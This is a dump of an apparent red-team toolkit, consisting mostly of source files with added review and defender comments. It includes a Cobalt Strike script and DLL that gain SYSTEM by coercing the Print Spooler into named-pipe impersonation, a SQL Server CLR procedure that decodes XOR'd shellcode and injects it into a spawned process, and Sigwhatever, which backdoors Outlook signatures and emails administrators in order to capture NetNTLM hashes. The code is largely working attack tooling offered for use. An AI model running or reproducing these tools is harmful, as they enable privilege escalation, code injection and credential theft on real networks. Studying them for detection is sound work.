// bounded both by the generator RandomString uses and by the alphabet
// (26^10, about 47 bits at most).
public static string key = RandomString(10, false);
21 |
22 | public static string RandomString(int size, bool lowerCase)
23 | {
24 | StringBuilder builder = new StringBuilder();
25 | Random random = new Random();
26 | char ch;
27 | for (int i = 0; i < size; i++)
28 | {
29 | ch = Convert.ToChar(Convert.ToInt32(Math.Floor(26 * random.NextDouble() + 65)));
30 | builder.Append(ch);
31 | }
32 | if (lowerCase)
33 | return builder.ToString().ToLower();
34 | return builder.ToString();
35 | }
36 |
37 | public void Doit( string urlPrefix, string port, string logFile, string argChallenge)
38 | {
39 | string computerName = Environment.MachineName;
40 | string netbiosDomain = Environment.UserDomainName;
41 | string dnsDomain;
42 |
43 | try
44 | {
45 | dnsDomain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;
46 | }
47 | catch
48 | {
49 | dnsDomain = netbiosDomain;
50 | }
51 |
52 | Regex r = new Regex("^[A-Fa-f0-9]{16}$");
53 | if (!String.IsNullOrEmpty(argChallenge) && !r.IsMatch(argChallenge))
54 | {
55 | Console.WriteLine("[ERROR] Challenge is invalid");
56 | return;
57 | }
58 |
59 | // Print all the options
60 | string version = "0.913-SW";
61 | Console.WriteLine(String.Format("[+] HTTPCap {0} started at {1}", version, DateTime.Now.ToString("s")));
62 | Console.WriteLine(String.Format("[+] Encryption Password is: " + key));
63 | if (!String.IsNullOrEmpty(argChallenge)) Console.WriteLine(String.Format("[+] HTTP NTLM Challenge = {0}", argChallenge));
64 | Console.WriteLine(String.Format("[+] HTTP Authentication = {0}", true));
65 |
66 | // Fire HttpListener thread
67 | using (HttpServer srvr = new HttpServer(5, argChallenge, computerName, dnsDomain, netbiosDomain, logFile, Convert.ToInt32(port), urlPrefix))
68 | {
69 | if (srvr.Start())
70 | while (true) { };
71 | }
72 | }
73 | }
74 | }
--------------------------------------------------------------------------------
/Tools/spoolsystem/cna/spoolsystem.cna:
--------------------------------------------------------------------------------
1 | import common.CommonUtils;
2 | import beacon.CommandBuilder;
3 | import common.ReflectiveDLL;
4 |
# SpoolTrigger(bid, pipename, method)
#   $1 - beacon id
#   $2 - pipe name component passed to the SpoolTrigger DLL as its argument
#   $3 - "spawn" runs the DLL through bdllspawn; any other value takes the
#        patch-and-inject branch below
# Picks the x64 or x86 SpoolTrigger DLL from the beacon's 'barch' value.
#
# Defender note: the spawn branch goes through bdllspawn, the inject branch
# targets the PID reported by binfo($bid, 'pid'), i.e. the beacon's own process.
# NOTE(review): $method is not listed in local(), and $spawn / $pipenameW are
# declared but never used.
sub SpoolTrigger {
	local('$bid $pipename $spawn $offset $padding $patched $dllbytes $file $builder $pid $pipenameW');
	$bid = $1;
	$pipename = $2;
	$method = $3;

	if ($method eq "spawn") {
		# this is to avoid cross-arch injection where possible
		if(binfo($bid, 'barch') eq 'x64') {
			bdllspawn($1, script_resource("bin/SpoolTrigger.x64.dll"), $pipename, "spooltrigger", 5000, true);
		}
		else {
			bdllspawn($1, script_resource("bin/SpoolTrigger.x86.dll"), $pipename, "spooltrigger", 5000, true);
		}
	}
	else {
		# patch and self-inject..
		# first we need to patch up our arguments
		# we use internal APIs since bdllinject wants a filepath not bytes
		if(binfo($bid, 'barch') eq 'x64') {
			$file = script_resource("bin/SpoolTrigger.x64.dll");
		}
		else {
			$file = script_resource("bin/SpoolTrigger.x86.dll");
		}

		# The DLL carries a "PATCHME" marker; the bytes at the marker are replaced
		# with padding followed by the pipe name. dllmain.cpp reads its argument
		# from 7 bytes past the marker (the length of "PATCHME").
		$dllbytes = [CommonUtils readFile: $file];
		$padding = [CommonUtils garbage: "PATCHME"];
		$patched = [CommonUtils patch: $dllbytes, "PATCHME", $padding . $pipename];
		$offset = [ReflectiveDLL findReflectiveLoader: $dllbytes];

		if($offset <= 0) {
			berror($1, "Could not find ReflectiveLoader");
			return;
		}

		$pid = binfo($bid, 'pid');
		blog($bid, "Injecting spooltrigger into PID: " . $pid);
		$builder = [new CommandBuilder];
		# 43 and 9 are internal task ids; this code only shows that 43 is chosen
		# for a 64-bit DLL and 9 otherwise - their exact meaning is not visible here.
		if ([ReflectiveDLL is64: $dllbytes]) {
			[$builder setCommand: 43];
		} else {
			[$builder setCommand: 9];
		}
		# Task payload: target PID, loader offset, then the patched DLL bytes.
		[$builder addInteger: parseNumber($pid)];
		[$builder addInteger: $offset];
		[$builder addString: [CommonUtils bString: $patched]];
		call("beacons.task", $null, $bid, cast([$builder build], 'b'));
	}
}
55 |
# SpoolSystem(bid, method)
#   $1 - beacon id
#   $2 - execution method, forwarded unchanged to SpoolTrigger
# Sequence: enable SeImpersonatePrivilege, create a named pipe, call
# SpoolTrigger, then impersonate the client that connected to the pipe.
# The task is tagged with ATT&CK technique T1134.
#
# Defender notes:
#  - The token must already hold SeImpersonatePrivilege, so exposure is
#    limited to accounts granted that right.
#  - The pipe created here has the form \\.\pipe\<name>\pipe\spoolss. A pipe
#    whose name ends in \pipe\spoolss but is not the spooler's own is a
#    high-signal indicator in pipe-creation telemetry (for example Sysmon
#    events 17 and 18).
#  - Stopping and disabling the Print Spooler service on hosts that do not
#    print removes the RPC endpoint this depends on.
# NOTE(review): the local() line has no terminating semicolon in this listing.
sub SpoolSystem {
	local('$mypipe $pipename $builder')
	# needed for ImpersonateNamedPipeClient
	btask($1, "Tasked beacon to get SYSTEM via spoolss", "T1134");
	bgetprivs($1, "SeImpersonatePrivilege");

	# fire up a named pipe
	# presumably [CommonUtils garbage:] returns a random string - confirm
	$mypipe = [CommonUtils garbage: "spooltrigger"];
	$pipename = "\\\\.\\pipe\\" . $mypipe . "\\pipe\\spoolss";
	$builder = [new CommandBuilder];
	# internal task id 60 with the pipe name as its only argument
	[$builder setCommand: 60];
	[$builder addString: $pipename];
	call("beacons.task", $null, $1, cast([$builder build], 'b'));

	# trigger spoolss
	SpoolTrigger($1, $mypipe, $2);

	# impersonate the named pipe client
	# the same builder is reused, so the pipe name added above is still part
	# of this task
	[$builder setCommand: 61];
	call("beacons.task", $null, $1, cast([$builder build], 'b'));
}
77 |
# Registers the help entry for the "spoolsystem" command.
# NOTE(review): the "Use:" line appears to have lost its argument placeholder
# in this listing; the examples show the two accepted values, "inject" and
# "spawn".
beacon_command_register("spoolsystem", "Gets SYSTEM via spoolss",
	"Uses named pipe impersonation to gain SYSTEM via Print Spooler.\n\n" .
	"Use: spoolsystem \n\n" .
	"Example: spoolsystem inject\n" .
	"Example: spoolsystem spawn" );
83 |
# Console alias: takes everything after "spoolsystem " as the method and passes
# it to SpoolSystem. The value is not checked against "spawn"/"inject" here;
# SpoolTrigger treats anything other than "spawn" as the inject path.
alias spoolsystem {
	local('$args');
	$args = substr($0, strlen("spoolsystem "));

	if ($args eq "") {
		berror($1, "Please specify an execution method.");
		return;
	}
	SpoolSystem($1, $args);
}
--------------------------------------------------------------------------------
/Tools/Sigwhatever/README.md:
--------------------------------------------------------------------------------
1 | # Sigwhatever
2 | Automates NetNTLM hash capture via image tags in email signatures. This targets Outlook specifically and will insert a 1x1px image into an existing signature block, or create a new signature as required. A listener is then started to capture authentication attempts that happen as a result of sent emails being viewed by other users.
3 |
4 | The tool borrows code from the Seatbelt and Inveigh projects - features are:
5 |
6 | * Queries the firewall for suitable ports to listen on (Uses some seatbelt code)
7 | * Cross references HttpQueryServiceConfiguration for any usable URL ACLs
8 | * TCP/HTTP server and hash capture (Uses Inveigh code)
9 | * Signature Detection (to modify the appropriate registry settings and signatures)
10 | * Modification of Signature
11 | * Feature to send mail to specific group (e.g. domain admins)
12 | * Option to create encrypted logs on disk
13 | * Cleanup (Reverts changes in signature settings and existing signature)
14 |
15 | ---
16 |
17 | ## TL;DR
18 |
19 | run:
20 |
21 | `execute-assembly sigwhatever.exe AUTO`
22 |
23 | Then when you're finished, run:
24 |
25 | `execute-assembly sigwhatever.exe CLEANUP`
26 |
27 | Bear in mind that even running jobkill on the .net job does not seem to kill the spawned process.
28 |
29 | ---
30 | ## Usage
31 |
32 | `SigWhatever.exe [OPTIONS]+ operation`
33 |
34 |
35 | ### OPTIONS:
36 | ```
37 | -p, --port=VALUE TCP Port.
38 | -l, --log=VALUE Log file path.
39 | -g, --group=VALUE Target Active Directory group.
40 | -f, --force Force HTTP server start.
41 | --ba, --backdoor-all Backdoor all signatures.
42 | -c, --challenge=VALUE NTLM Challenge (in hex).
43 | -u, --url-prefix=VALUE URL Prefix. e.g. /MDEServer/test
44 | -h, --help Show this message and exit.
45 | ```
46 |
47 | ### OPERATIONS:
48 |
49 | - **AUTO**: Just do everything for me - backdoor the signature and start the listener on this box.
50 | _Usage_: `SigWhatever.exe AUTO`
51 |
52 | - **CHECKTRUST**: Check the trust zone settings - if the domain isn't in there then this probably won't work.
53 | _Usage_: `SigWhatever.exe CHECKTRUST`
54 |
55 | - **CHECKFW**: Check whether the host based firewall is on and whether there's an exception for the chosen port.
56 | _Usage_: `SigWhatever.exe CHECKFW -p `
57 |
58 | - **SIGNATURE**: Hijack the current user's signature, or add a new one via registry changes.
59 | _Usage_: `SigWhatever.exe SIGNATURE -p -l -u --backdoor-all --force`
60 | _Note_: If `--backdoor-all` is not specified then the tool will attempt to get the current signature from Outlook - this may cause a popup for the user if their AV is outdated.
61 |
62 | - **SIGNOLISTEN**: Hijack the current user's signature, or add a new one via registry changes.
63 | _Usage_: `SigWhatever.exe SIGNOLISTEN -s -p -l --backdoor-all>`
64 |
65 | - **CLEANUP**: Remove any modifications to the registry or htm signature files.
66 | _Usage_: `SigWhatever.exe CLEANUP`
67 |
68 | - **EMAILADMINS**: Enumerate email addresses from an AD group and send them a 'blank' email with the payload.
69 | _Usage_: `SigWhatever.exe EMAILADMINS -g -p -l --force`
70 |
71 | - **LISTENONLY**: Just start the listener - make sure it's on the same port.
72 | _Usage_: `SigWhatever.exe LISTENONLY -p -l `
73 |
74 | - **SHOWACLS**: List all URL Reservation ACLs with User, Everyone or Authenticated Users permissions.
75 | _Usage_: `SigWhatever.exe SHOWACLS`
76 |
77 |
78 | ## Authors:
79 | - David Cash
80 | - Rich Warren
81 | - Julian Storr
82 |
--------------------------------------------------------------------------------
/Tools/Squeak/Home.xaml:
--------------------------------------------------------------------------------
1 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
43 |
44 | Raw Bin
45 |
46 |
47 | Server
48 |
49 |
50 | Port
51 |
52 |
53 | Database
54 |
55 |
56 | Username
57 |
58 |
59 | Password
60 |
61 |
62 | Debug Output
63 |
64 |
65 |
66 | Authenticate as current Windows identity
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
--------------------------------------------------------------------------------
/Tools/spoolsystem/SpoolTrigger/ms-rprn.idl:
--------------------------------------------------------------------------------
1 | // https://github.com/leechristensen/SpoolSample/blob/master/MS-RPRN/ms-rprn.idl
2 | // [MS-RPRN] interface
// Trimmed client-side definition of the Print System Remote Protocol
// interface, bound over the spoolss named pipe (see the endpoint attribute).
//
// Method order is significant: MIDL assigns operation numbers (opnums) by
// position, starting at 0. Methods the client never calls are declared as
// parameterless stubs purely to hold their slot, so the three fully declared
// methods land on the right opnum:
//   RpcOpenPrinter                                   -> opnum 1
//   RpcClosePrinter                                  -> opnum 29
//   RpcRemoteFindFirstPrinterChangeNotificationEx    -> opnum 65
// Do not reorder, insert or delete entries.
//
// Defender note: opnum 65 on this interface is the call that asks a spooler
// to open a notification channel back to a caller-supplied machine name, so
// RPC filtering or network monitoring keyed on this interface UUID and opnum
// covers the coercion step.
[
uuid(12345678-1234-ABCD-EF00-0123456789AB),
version(1.0),
ms_union,
endpoint("ncacn_np:[\\pipe\\spoolss]"),
pointer_default(unique)
]

interface winspool {

import "oaidl.idl";

#if __midl < 700
#define disable_consistency_check
#endif
// [MS-RPRN] common info container structures
// Length-prefixed byte buffer; pDevMode holds cbBuf bytes.
typedef struct _DEVMODE_CONTAINER {
    DWORD cbBuf;
    [size_is(cbBuf), unique] BYTE* pDevMode;
} DEVMODE_CONTAINER;

// pFields is an array of Count entries.
typedef struct _RPC_V2_NOTIFY_OPTIONS_TYPE {
    unsigned short Type;
    unsigned short Reserved0;
    DWORD Reserved1;
    DWORD Reserved2;
    DWORD Count;
    [size_is(Count), unique] unsigned short* pFields;
} RPC_V2_NOTIFY_OPTIONS_TYPE;

// pTypes is an array of Count RPC_V2_NOTIFY_OPTIONS_TYPE entries.
typedef struct _RPC_V2_NOTIFY_OPTIONS {
    DWORD Version;
    DWORD Reserved;
    DWORD Count;
    [size_is(Count), unique] RPC_V2_NOTIFY_OPTIONS_TYPE* pTypes;
} RPC_V2_NOTIFY_OPTIONS;

// [MS-RPRN] common data types
typedef unsigned short LANGID;
typedef [context_handle] void* GDI_HANDLE;
typedef [context_handle] void* PRINTER_HANDLE;
// [handle] makes this a custom binding handle: the generated stub calls the
// user-supplied STRING_HANDLE_bind / STRING_HANDLE_unbind routines.
typedef [handle] wchar_t* STRING_HANDLE;

// [MS-RPRN] methods
DWORD RpcEnumPrinters();
// opnum 1: pPrinterName doubles as the binding string (STRING_HANDLE).
DWORD RpcOpenPrinter(
    [in, string, unique] STRING_HANDLE pPrinterName,
    [out] PRINTER_HANDLE* pHandle,
    [in, string, unique] wchar_t* pDatatype,
    [in] DEVMODE_CONTAINER* pDevModeContainer,
    [in] DWORD AccessRequired
);
DWORD RpcSetJob();
DWORD RpcGetJob();
DWORD RpcEnumJobs();
DWORD RpcAddPrinter();
DWORD RpcDeletePrinter();
DWORD RpcSetPrinter();
DWORD RpcGetPrinter();
DWORD RpcAddPrinterDriver();
DWORD RpcEnumPrinterDrivers();
DWORD RpcGetPrinterDriver();
DWORD RpcGetPrinterDriverDirectory();
DWORD RpcDeletePrinterDriver();
DWORD RpcAddPrintProcessor();
DWORD RpcEnumPrintProcessors();
DWORD RpcGetPrintProcessorDirectory();
DWORD RpcStartDocPrinter();
DWORD RpcStartPagePrinter();
DWORD RpcWritePrinter();
DWORD RpcEndPagePrinter();
DWORD RpcAbortPrinter();
DWORD RpcReadPrinter();
DWORD RpcEndDocPrinter();
DWORD RpcAddJob();
DWORD RpcScheduleJob();
DWORD RpcGetPrinterData();
DWORD RpcSetPrinterData();
DWORD RpcWaitForPrinterChange();
// opnum 29: the handle is [in, out].
DWORD RpcClosePrinter(
    [in, out] PRINTER_HANDLE* phPrinter
);
DWORD RpcAddForm();
DWORD RpcDeleteForm();
DWORD RpcGetForm();
DWORD RpcSetForm();
DWORD RpcEnumForms();
DWORD RpcEnumPorts();
DWORD RpcEnumMonitors();
void Opnum37NotUsedOnWire();
void Opnum38NotUsedOnWire();
DWORD RpcDeletePort();
DWORD RpcCreatePrinterIC();
DWORD RpcPlayGdiScriptOnPrinterIC();
DWORD RpcDeletePrinterIC();
void Opnum43NotUsedOnWire();
void Opnum44NotUsedOnWire();
void Opnum45NotUsedOnWire();
DWORD RpcAddMonitor();
DWORD RpcDeleteMonitor();
DWORD RpcDeletePrintProcessor();
void Opnum49NotUsedOnWire();
void Opnum50NotUsedOnWire();
DWORD RpcEnumPrintProcessorDatatypes();
DWORD RpcResetPrinter();
DWORD RpcGetPrinterDriver2();
void Opnum54NotUsedOnWire();
void Opnum55NotUsedOnWire();
DWORD RpcFindClosePrinterChangeNotification();
void Opnum57NotUsedOnWire();
DWORD RpcReplyOpenPrinter();
DWORD RpcRouterReplyPrinter();
DWORD RpcReplyClosePrinter();
DWORD RpcAddPortEx();
DWORD RpcRemoteFindFirstPrinterChangeNotification();
void Opnum63NotUsedOnWire();
void Opnum64NotUsedOnWire();
// opnum 65: pszLocalMachine names the machine that receives notifications.
DWORD RpcRemoteFindFirstPrinterChangeNotificationEx(
    [in] PRINTER_HANDLE hPrinter,
    [in] DWORD fdwFlags,
    [in] DWORD fdwOptions,
    [in, string, unique] wchar_t* pszLocalMachine,
    [in] DWORD dwPrinterLocal,
    [in, unique] RPC_V2_NOTIFY_OPTIONS* pOptions
);
}
--------------------------------------------------------------------------------
/Tools/Sigwhatever/Crypto.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.IO;
3 | using System.Security.Cryptography;
4 | using System.Text;
5 |
6 | namespace Sigwhatever
7 | {
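/// <summary>
/// Password-based symmetric encryption helper. Output is Base64 text.
/// </summary>
/// <remarks>
/// Known weaknesses, kept as-is because changing any of them would make
/// previously written data undecryptable:
///  - the salt and IV are compile-time constants, so equal plaintexts under
///    equal passwords give equal ciphertexts and the salt adds nothing
///    against precomputation;
///  - the iteration count is 2, so password guessing is cheap;
///  - PasswordDeriveBytes is PBKDF1-based; Rfc2898DeriveBytes (PBKDF2) is the
///    supported replacement;
///  - CBC is used without a MAC, so ciphertext is not tamper-evident.
/// Treat the output as obfuscated, not as protected against a determined
/// reader, unless these are addressed in a versioned format.
/// </remarks>
public class Crypto
{
    #region Settings
    private static int _iterations = 2;
    private static int _keySize = 256;
    private static string _hash = "SHA1";
    private static string _salt = "asvlraaa38490a31"; // fixed value shared by every build
    private static string _vector = "8947ar34avl34kjw"; // fixed 16-byte IV
    #endregion

    /// <summary>Encrypts <paramref name="value"/> with the default algorithm.</summary>
    /// <remarks>
    /// NOTE(review): the type argument was lost in this listing. AesManaged is
    /// assumed because the 256-bit key size and 16-byte IV match AES - confirm
    /// against the repository.
    /// </remarks>
    public string Encrypt(string value, string password)
    {
        return Encrypt<AesManaged>(value, password);
    }

    /// <summary>
    /// Encrypts <paramref name="value"/> with algorithm <typeparamref name="T"/>
    /// in CBC mode, using a key derived from <paramref name="password"/>.
    /// </summary>
    /// <returns>Base64 encoding of the ciphertext.</returns>
    public string Encrypt<T>(string value, string password)
        where T : SymmetricAlgorithm, new()
    {
        byte[] vectorBytes = Encoding.ASCII.GetBytes(_vector);
        byte[] saltBytes = Encoding.ASCII.GetBytes(_salt);
        // UTF-8 to match Decrypt. ASCII encoding here silently replaced every
        // non-ASCII character with '?'. ASCII input produces identical bytes,
        // so existing ciphertexts are unaffected.
        byte[] valueBytes = Encoding.UTF8.GetBytes(value);

        byte[] encrypted;
        using (T cipher = new T())
        {
            PasswordDeriveBytes _passwordBytes =
                new PasswordDeriveBytes(password, saltBytes, _hash, _iterations);
            byte[] keyBytes = _passwordBytes.GetBytes(_keySize / 8);

            cipher.Mode = CipherMode.CBC;

            using (ICryptoTransform encryptor = cipher.CreateEncryptor(keyBytes, vectorBytes))
            using (MemoryStream to = new MemoryStream())
            using (CryptoStream writer = new CryptoStream(to, encryptor, CryptoStreamMode.Write))
            {
                writer.Write(valueBytes, 0, valueBytes.Length);
                // Emit the final padded block before reading the buffer.
                writer.FlushFinalBlock();
                encrypted = to.ToArray();
            }
            cipher.Clear();
        }
        return Convert.ToBase64String(encrypted);
    }

    /// <summary>Decrypts <paramref name="value"/> with the default algorithm.</summary>
    /// <remarks>NOTE(review): same assumed default algorithm as Encrypt.</remarks>
    public string Decrypt(string value, string password)
    {
        return Decrypt<AesManaged>(value, password);
    }

    /// <summary>
    /// Reverses <see cref="Encrypt{T}"/>.
    /// </summary>
    /// <returns>
    /// The plaintext, or an empty string when decryption fails (wrong
    /// password, corrupt data). Input that is not valid Base64 still throws
    /// FormatException, because decoding happens before the try block.
    /// </returns>
    public string Decrypt<T>(string value, string password) where T : SymmetricAlgorithm, new()
    {
        byte[] vectorBytes = Encoding.ASCII.GetBytes(_vector);
        byte[] saltBytes = Encoding.ASCII.GetBytes(_salt);
        byte[] valueBytes = Convert.FromBase64String(value);

        byte[] decrypted;

        using (T cipher = new T())
        {
            PasswordDeriveBytes _passwordBytes = new PasswordDeriveBytes(password, saltBytes, _hash, _iterations);
            byte[] keyBytes = _passwordBytes.GetBytes(_keySize / 8);

            cipher.Mode = CipherMode.CBC;

            try
            {
                using (ICryptoTransform decryptor = cipher.CreateDecryptor(keyBytes, vectorBytes))
                using (MemoryStream from = new MemoryStream(valueBytes))
                using (CryptoStream reader = new CryptoStream(from, decryptor, CryptoStreamMode.Read))
                using (MemoryStream plain = new MemoryStream())
                {
                    // A single Read() is allowed to return fewer bytes than are
                    // available, which would truncate the plaintext; drain the
                    // stream until it reports end of data.
                    byte[] buffer = new byte[4096];
                    int read;
                    while ((read = reader.Read(buffer, 0, buffer.Length)) > 0)
                    {
                        plain.Write(buffer, 0, read);
                    }
                    decrypted = plain.ToArray();
                }
            }
            catch (Exception)
            {
                // Deliberate best effort: callers get "" rather than an exception.
                return String.Empty;
            }
            cipher.Clear();
        }
        return Encoding.UTF8.GetString(decrypted, 0, decrypted.Length);
    }
}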
100 | }
101 |
--------------------------------------------------------------------------------
/Tools/Squeak/clrcode.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Data;
3 | using System.Data.SqlClient;
4 | using System.Data.SqlTypes;
5 | using Microsoft.SqlServer.Server;
6 | using System.Net;
7 | using System.Runtime.InteropServices;
8 | using System.Diagnostics;
9 | using System.Text;
10 |
// SQL CLR stored-procedure class. runner() is the procedure entry point; it
// calls Exec(), which starts a child process and runs a byte buffer inside it
// through the Win32 calls declared below.
//
// Defender notes:
//  - The P/Invoke declarations mean the assembly has to be catalogued with the
//    UNSAFE permission set, and CLR integration has to be enabled on the
//    instance. Keeping "clr enabled" off where it is not needed, leaving
//    "clr strict security" on, and auditing CREATE ASSEMBLY / ALTER ASSEMBLY
//    and sp_configure changes cover this path.
//  - At run time the child process is created by whatever process hosts the
//    CLR (presumably the SQL Server service - confirm), followed by
//    cross-process allocation of RWX memory, a remote write and a remote
//    thread. A database engine spawning mspaint.exe is itself anomalous.
public partial class StoredProcedures
{
    // Procedure entry point: sends the current UTC time back to the caller
    // over the SQL pipe, then calls Exec().
    [Microsoft.SqlServer.Server.SqlProcedure]
    public static void runner ()
    {
        SqlPipe sqlPipeLine = SqlContext.Pipe;
        sqlPipeLine.Send(DateTime.UtcNow.ToString());


        Exec();



    }

    // XORs every byte of arr1 with arr2[0] and returns a new array.
    // NOTE(review): only the first byte of arr2 is ever used, so this is a
    // single-byte XOR regardless of the key length passed in. Throws if arr2
    // is empty.
    public static byte[] exclusiveOR(byte[] arr1, byte[] arr2)
    {


        byte[] result = new byte[arr1.Length];

        for (int i = 0; i < arr1.Length; ++i)
            result[i] = (byte)(arr1[i] ^ arr2[0]);

        return result;
    }

    // Returns the lower-case hex encoding of ba, two digits per byte.
    public static string ByteArrayToString(byte[] ba)
    {
        StringBuilder hex = new StringBuilder(ba.Length * 2);
        foreach (byte b in ba)
            hex.AppendFormat("{0:x2}", b);
        return hex.ToString();
    }

    // Decodes a hex string into bytes. Throws when the length is odd.
    // Characters are not validated; see GetHexVal.
    public static byte[] StringToByteArray(string hex)
    {
        if (hex.Length % 2 == 1)
            throw new Exception("The binary key cannot have an odd number of digits");

        byte[] arr = new byte[hex.Length >> 1];

        for (int i = 0; i < hex.Length >> 1; ++i)
        {
            // High nibble from the even position, low nibble from the odd one.
            arr[i] = (byte)((GetHexVal(hex[i << 1]) << 4) + (GetHexVal(hex[(i << 1) + 1])));
        }

        return arr;
    }
    // Maps '0'-'9', 'A'-'F' and 'a'-'f' to 0..15 by subtracting 48, 55 or 87
    // from the character code. Any other character yields a meaningless value
    // rather than an error.
    public static int GetHexVal(char hex)
    {
        int val = (int)hex;

        return val - (val < 58 ? 48 : (val < 97 ? 55 : 87));
    }

    [DllImport("kernel32.dll")]
    public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);

    [DllImport("kernel32.dll", CharSet = CharSet.Auto)]
    public static extern IntPtr GetModuleHandle(string lpModuleName);

    [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
    static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
    static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten);

    [DllImport("kernel32.dll")]
    static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

    // Starts mspaint.exe, then allocates, writes and starts a thread in it.
    // GetModuleHandle and GetProcAddress are declared above but not used here.
    // As listed, h is the literal placeholder "[HEX]" (five characters), so
    // StringToByteArray throws on the odd length before any memory call is
    // made; presumably the placeholder is substituted before compilation.
    public static void Exec()
    {

        var p = new Process();
        //Spawnto binary
        p.StartInfo.FileName = "mspaint.exe";

        p.Start();

        try
        {
            var procId = p.Id;
            Console.WriteLine("ID: " + procId);
        }
        catch(Exception e)
        {
            // Swallowed; e is unused.
        }


        Process targetProcess;

        try
        {
            targetProcess = Process.GetProcessById(p.Id);
        }
        catch
        {
            System.Console.WriteLine("Process not found!");
            return;
        }

        // Get process handler
        // 0x1F0FFF is PROCESS_ALL_ACCESS. The handle is never closed.
        IntPtr process_handle = OpenProcess(0x1F0FFF, false, targetProcess.Id);


        string h = "[HEX]";
        byte[] k = new byte[] { 0xDE };
        byte[] shellcode = exclusiveOR(StringToByteArray(h), k);

        // Allocate a memory space in target process, big enough to store the shellcode
        // 0x00001000 is MEM_COMMIT and 0x40 is PAGE_EXECUTE_READWRITE; a
        // remote RWX private allocation is a common EDR detection point.
        IntPtr memory_allocation_variable = VirtualAllocEx(process_handle, IntPtr.Zero, (uint)(shellcode.Length), 0x00001000, 0x40);

        // Write the shellcode
        UIntPtr bytesWritten;
        WriteProcessMemory(process_handle, memory_allocation_variable, shellcode, (uint)(shellcode.Length), out bytesWritten);

        // Starts a remote thread whose start address is the buffer allocated
        // above (the earlier comment describing a LoadLibraryA call did not
        // match this code).
        if (CreateRemoteThread(process_handle, IntPtr.Zero, 0, memory_allocation_variable, IntPtr.Zero, 0, IntPtr.Zero) != IntPtr.Zero)
        {
            Console.Write("done!");
        }
        else
        {
            Console.Write("failed!");
        }
    }

}
--------------------------------------------------------------------------------
/Tools/spoolsystem/SpoolTrigger/dllmain.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include "ms-rprn_h.h"
5 | #include "ReflectiveLoader.h"
6 | #include "patch.h"
7 |
8 | #include
9 | #include
10 | #include
11 |
12 | #pragma comment(lib, "rpcrt4.lib")
13 |
14 | extern HINSTANCE hAppInstance;
15 |
// Asks the local Print Spooler, over MS-RPRN, to open a change-notification
// channel to a caller-chosen path on this same machine.
//
// lpParam: pipe name component (wide string). It is combined with the local
//          computer name into "\\<computer>/pipe/<name>".
// Returns: always 0; failures are not reported to the caller.
//
// The matching listener in spoolsystem.cna is created as
// \\.\pipe\<name>\pipe\spoolss, which is where the spooler's connection is
// expected to arrive.
//
// Defender note: the observable sequence is RpcOpenPrinter (opnum 1) followed
// by RpcRemoteFindFirstPrinterChangeNotificationEx (opnum 65) against the
// local spoolss pipe, then the spooler connecting to a pipe it does not own.
// NOTE(review): hr is unused; the StringCchPrintf results are not checked;
// the ';' after RpcExcept(...) is stray.
DWORD WINAPI TriggerNamedPipeConnection(LPWSTR lpParam)
{
    HRESULT hr = NULL;
    PRINTER_HANDLE hPrinter = NULL;
    DEVMODE_CONTAINER devmodeContainer = { 0 };

    LPWSTR pwszComputerName = NULL;
    DWORD dwComputerNameLen = MAX_COMPUTERNAME_LENGTH + 1;

    LPWSTR pwszTargetServer = NULL;
    LPWSTR pwszCaptureServer = NULL;

    LPWSTR pwszPipeName = lpParam;

    pwszComputerName = (LPWSTR)malloc(dwComputerNameLen * sizeof(WCHAR));
    if (!pwszComputerName)
        goto cleanup;

    if (!GetComputerName(pwszComputerName, &dwComputerNameLen))
        goto cleanup;

    pwszTargetServer = (LPWSTR)malloc(MAX_PATH * sizeof(WCHAR));
    if (!pwszTargetServer)
        goto cleanup;

    pwszCaptureServer = (LPWSTR)malloc(MAX_PATH * sizeof(WCHAR));
    if (!pwszCaptureServer)
        goto cleanup;

    // Target is the local spooler; the capture path is on the same host.
    StringCchPrintf(pwszTargetServer, MAX_PATH, L"\\\\%ws", pwszComputerName);
    StringCchPrintf(pwszCaptureServer, MAX_PATH, L"\\\\%ws/pipe/%ws", pwszComputerName, pwszPipeName);

    RpcTryExcept
    {
        if (RpcOpenPrinter(pwszTargetServer, &hPrinter, NULL, &devmodeContainer, 0) == RPC_S_OK)
        {
            // The return value is ignored; the call is made for its side effect.
            RpcRemoteFindFirstPrinterChangeNotificationEx(hPrinter, PRINTER_CHANGE_ADD_JOB, 0, pwszCaptureServer, 0, NULL);
            RpcClosePrinter(&hPrinter);
            wprintf(L"[+] Triggered named pipe connection to %ls\n", pwszCaptureServer);
        }
    }
    RpcExcept(EXCEPTION_EXECUTE_HANDLER);
    {
        // Expect RPC_S_SERVER_UNAVAILABLE
    }
    RpcEndExcept;

cleanup:
    if (pwszComputerName)
        free(pwszComputerName);
    if (pwszTargetServer)
        free(pwszTargetServer);
    if (pwszCaptureServer)
        free(pwszCaptureServer);
    // Only reached with a live handle when the try block was left early;
    // presumably RpcClosePrinter clears the [in, out] handle on success.
    if (hPrinter)
        RpcClosePrinter(&hPrinter);

    return 0;
}
75 |
// Bind routine for the [handle] STRING_HANDLE type: turns the server name the
// stub passes in into an RPC binding over ncacn_np to \pipe\spoolss.
// Returns NULL when the string binding cannot be composed or converted.
handle_t __RPC_USER STRING_HANDLE_bind(STRING_HANDLE lpStr)
{
    RPC_WSTR composedBinding;
    handle_t hBinding;

    RPC_STATUS status = RpcStringBindingComposeW(
